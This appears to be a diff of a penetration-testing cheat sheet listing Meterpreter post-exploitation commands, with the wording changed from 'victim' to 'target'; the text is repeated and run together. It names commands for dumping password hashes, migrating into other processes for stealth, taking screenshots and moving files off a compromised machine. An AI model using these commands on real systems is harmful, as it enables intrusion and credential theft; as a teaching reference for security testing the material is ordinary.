ODarkkk/Cheat-Sheets/cheatsheets.md

 ### Meterpreter Commands

-sysinfo # View the victim's system information getuid # Displays the user context Meterpreter is currently running as shell # Access the command line on the victim's computer ps # Lists running processes on the target migrate <PID> # Moves the Meterpreter session into another process (improves stability/stealth) screenshot # Take a screenshot of the victim's screen hashdump # Dumps password hashes from the target's SAM database (requires SYSTEM privileges) download <remote file> <local path> # Downloads a file from the target to the attacker machine upload <local file> <remote path> # Uploads a file from the attacker machine to the target sessions -l # Lists all active sessions background # Backgrounds the current session, returning to the msfconsole prompt

-### Meterpreter Commands

-sysinfo # To view the victim's system information shell # To access the command line on the victim's computer screenshot # To take a screenshot of the victim's screen getuid # Displays the user context Meterpreter is currently running as ps # Lists running processes on the target migrate <PID> # Moves the Meterpreter session into another process (improves stability/stealth)
+sysinfo # To view the target's system information shell # To access the command line on the target's computer screenshot # To take a screenshot of the target's screen getuid # Displays the user context Meterpreter is currently running as ps # Lists running processes on the target migrate <PID> # Moves the Meterpreter session into another process (improves stability/stealth)